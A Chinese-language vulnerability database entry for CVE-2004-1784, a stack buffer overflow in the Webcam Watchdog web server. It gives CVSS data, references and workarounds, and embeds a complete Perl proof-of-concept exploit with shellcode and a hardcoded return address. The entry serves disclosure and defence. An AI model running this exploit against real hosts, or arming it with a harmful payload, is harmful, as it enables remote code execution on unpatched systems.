CVE-2004-1784
CVSS7.5
发布时间 :2004-01-03 00:00:00
修订时间 :2008-09-05 16:42:20
NMCOE    

[原文]Buffer overflow in the web server of Webcam Watchdog 3.63 allows remote attackers to execute arbitrary code via a long HTTP GET request.


[CNNVD]Webcam Corp Webcam Watchdog Web Server远程缓冲区溢出漏洞(CNNVD-200401-002)

        
        Webcam Watchdog是一套功能强大的远端数位监控系统,同时具备网路监控、数码录影以及网络直播功能。
        Webcam Watchdog包含的web服务程序对超长HTTP GET请求缺少边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以web进程权限在系统上执行任意指令。
        提交超过234字符的HTTP GET请求到Webcam Watchdog监听的80端口,可触发缓冲区溢出,精心构建提交数据,可能以Web进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:webcam_corp:webcam_watchdog:1.1
cpe:/a:webcam_corp:webcam_watchdog:3.63
cpe:/a:webcam_corp:webcam_watchdog:1.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1784
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1784
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200401-002
(官方数据源) CNNVD

- 其它链接及资源

http://secunia.com/advisories/10527
(VENDOR_ADVISORY)  SECUNIA  10527
http://xforce.iss.net/xforce/xfdb/14131
(VENDOR_ADVISORY)  XF  webcam-watchdog-get-bo(14131)
http://www.webcamsoft.com/en/watchdog_h.html
(UNKNOWN)  MISC  http://www.webcamsoft.com/en/watchdog_h.html
http://www.securityfocus.com/bid/9351
(VENDOR_ADVISORY)  BID  9351
http://www.securityfocus.com/archive/1/348818
(VENDOR_ADVISORY)  BUGTRAQ  20040103 Webcam Watchdog Stack Overflow Vulnerability
http://www.osvdb.org/3312
(VENDOR_ADVISORY)  OSVDB  3312
http://www.elitehaven.net/webcamwatchdog.txt
(UNKNOWN)  MISC  http://www.elitehaven.net/webcamwatchdog.txt

- 漏洞信息

Webcam Corp Webcam Watchdog Web Server远程缓冲区溢出漏洞
高危 边界条件错误
2004-01-03 00:00:00 2005-10-20 00:00:00
远程  
        
        Webcam Watchdog是一套功能强大的远端数位监控系统,同时具备网路监控、数码录影以及网络直播功能。
        Webcam Watchdog包含的web服务程序对超长HTTP GET请求缺少边界检查,远程攻击者可以利用这个漏洞进行缓冲区溢出攻击,可能以web进程权限在系统上执行任意指令。
        提交超过234字符的HTTP GET请求到Webcam Watchdog监听的80端口,可触发缓冲区溢出,精心构建提交数据,可能以Web进程权限在系统上执行任意指令。
        

- 公告与补丁

        厂商补丁:
        Webcam Corp
        -----------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.webcamsoft.com/en/watchdog.html

- 漏洞信息 (23514)

Webcam Corp Webcam Watchdog 1.0/1.1/3.63 Web Server Buffer Overflow Vulnerability (EDBID:23514)
windows remote
2004-01-04 Verified
0 Peter Winter-Smith
N/A [点击下载]
source: http://www.securityfocus.com/bid/9351/info

A problem has been identified in the handling of remote web requests by the Webcam Watchdog software. Because of this, it may be possible for a remote attacker to gain unauthorized access to a vulnerable system. 

#!/usr/bin/perl -w
#
# Stack Overflow in Webcam Watchdog - Proof of Concept Exploit
#
# - Tested on version 3.63 - MessageBoxA Shellcode
#
# - By Peter Winter-Smith [peter4020@hotmail.com]

use IO::Socket;

if(!($ARGV[1]))
{
 print "\nUsage: wcwdpoc.pl <test_system> <port>\n" .
       "\tDefault port is 80\n\n";
 exit;
}

print "\nWebcam Watchdog 3.63 Stack Overflow PoC\n";


$target = IO::Socket::INET->new(Proto=>'tcp',
                                PeerAddr=>$ARGV[0],
                                PeerPort=>$ARGV[1])
                            or die "Unable to connect to $ARGV[0] on port $ARGV[1]";

$shellcode = "\x90\x90\x90\x90\x90\x90\x90\x90" .
                        "\xEB\x5D\x5F\x55\x89\xE5\x81\xC4" .
                        "\xF0\xFF\xFF\xFF\x57\xFC\xB0\xFE" .
                        "\xF2\xAE\x80\x47\xFF\x30\x5F\x57" .
                        "\x31\xD2\xB9\xFF\xFF\xFF\xFF\xB2" .
                        "\x05\xB0\xFF\xF2\xAE\xFE\x47\xFF" .
                        "\x57\xFE\xCA\x80\xFA\x01\x75\xF3" .
                        "\x81\xEC\xFC\xFF\xFF\xFF\x89\xE3" .
                        "\xFF\x73\x0C\xBE\xFF\xEC\x59\x42" .
                        "\xC1\xEE\x08\xFF\x16\xFF\x73\x08" .
                        "\x50\xBE\xFF\xE4\x59\x42\xC1\xEE" .
                        "\x08\xFF\x16\x31\xC9\x51\xFF\x73" .
                        "\x04\xFF\x33\x51\xFF\xD0\xCC\x90" .
                        "\xE8\x9D\xFF\xFF\xFF\x75\x73\x65" .
                        "\x72\x33\x32\xFE\x64\x6C\x6C\xFF" .
                        "\x4D\x65\x73\x73\x61\x67\x65\x42" .
                        "\x6F\x78\x41\xFF\x57\x61\x72\x6E" .
                        "\x69\x6E\x67\x21\xFF\x54\x68\x69" .
                        "\x73\x5F\x76\x65\x72\x73\x69\x6F" .
                        "\x6E\x5F\x6F\x66\x5F\x57\x65\x62" .
                        "\x63\x61\x6D\x5F\x57\x61\x74\x63" .
                        "\x68\x64\x6F\x67\x5F\x69\x73\x5F" .
                        "\x76\x75\x6C\x6E\x65\x72\x61\x62" .
                        "\x6C\x65\x5F\x74\x6F\x5F\x72\x65" .
                        "\x6D\x6F\x74\x65\x5F\x63\x6F\x6D" .
                        "\x70\x72\x6F\x6D\x69\x73\x65\x21" .
                        "\xFF";

$ebp = "BBBB";
$eip = "\x59\xAE\xE9\x77"; # WinXP Home SP1 'kernel32.dll' - 'call esp'

$badpage = "a"x234 . $ebp . $eip . $shellcode;

$request = "GET /" . $badpage. " HTTP/1.1\r\n" .
           "User-Agent: WCSAXRView\r\n" .
           "Host: 127.0.0.1\r\n" .
           "Cache-Control: no-cache\r\n\r\n";

print $target $request;

print " + Testing remote system\n + MessageBox should appear if vulnerable!\n";

sleep(2);

close($target);

print "Done.\n";
exit;
		

- 漏洞信息

3312
Webcam Watchdog Web Interface HTTP GET Request Handling Overflow
Input Manipulation
Loss of Integrity

- 漏洞描述

A remote overflow exists in Webcam Watchdog. The web interface fails to perform proper boundary checking, with a specially crafted request an attacker can trigger an overflow which may allow for arbitrary code execution resulting in a loss of confidentiality & integrity.

- 时间线

2004-01-05 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.64 or higher, as it has been reported to fix this vulnerability. However the vendor has not confirmed these findings. It is also possible to correct the flaw by implementing the following workaround(s): 1.) Restrict access to the web interface, allowing only trusted IP addresses to connect. 2.) Disable the remote viewing web interface.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站